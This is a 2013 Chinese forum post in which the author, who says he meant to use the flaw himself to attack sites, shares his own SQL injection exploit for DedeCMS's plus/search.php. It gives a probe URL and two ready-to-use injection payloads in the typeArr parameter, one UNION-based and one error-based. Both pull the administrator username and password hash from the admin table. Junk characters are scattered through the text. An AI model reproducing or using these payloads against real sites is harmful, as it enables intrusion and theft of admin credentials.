转载不加作者名的没JJ- _4 O8 M2 u: _" S: X
- c+ ?2 g' Q) q- Q a哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
! i8 p5 G: ^6 ~
7 P# F& i7 h- _# y. r既然已经发出来了,我就把我自己搞的exp发下吧。。唉。$ o2 x4 ^, z8 }" ?8 l: v
3 [! K: g7 {$ ~# X
我一般是这样测试的:# s& o7 w% o/ C; N& J0 t
2 L: D- y7 ^7 |& D! B提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
( E5 q, q2 E' ?
8 w% n4 P/ ]( Y. S转载不加作者名的没JJ( I7 G" }! v1 [' G, A; e* G$ S
) H1 @5 c! Q- e作者:鬼哥
- W5 _: m. v% Y# w; B A$ N! A3 ` v* z, O
% E w5 G5 @" _9 U$ K( c/ \
' c( D4 |! }, K6 _# K2 @2 r: {看结果如果提示5 N0 c. I/ }1 w: a3 s* u
; b1 o, T# x5 E0 q5 S, {8 @
Safe Alert: Request Error step 2 !' J. B7 _1 F# |! [
* y9 ?% i" N* t5 Z& g N
那么直接用下面的exp: F$ |/ D% o& j! j- i, P8 d# ^9 p, y
( E7 @0 }: A( [/ ^6 `' r: `6 ixx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a! P. M$ t# _* n
" ?: h0 e k, k: c8 N
/ F0 ? Z, ~! J3 Q: g6 h3 U看结果如果提示
: }- t6 e0 |& G2 L" V% t% T9 E
/ ~% b& M1 G" RSafe Alert: Request Error step 1 !& h) A8 @7 }. n7 S
6 A2 E, u: M0 X& z5 B1 g: J* S
那么直接用下面的exp: f6 e$ k8 [1 p% f$ u+ h
6 W! `# K# f5 r5 Nxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a7 ?; n1 ]$ n0 y0 P) S2 A
' M: q9 D N7 e( F
' B- N$ l8 n3 V如果正常显示证明漏洞不存在了。2 p( N4 S {, e! ^* j( {
) C/ q5 B4 w6 n5 T' }9 m+ H2 v. F转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对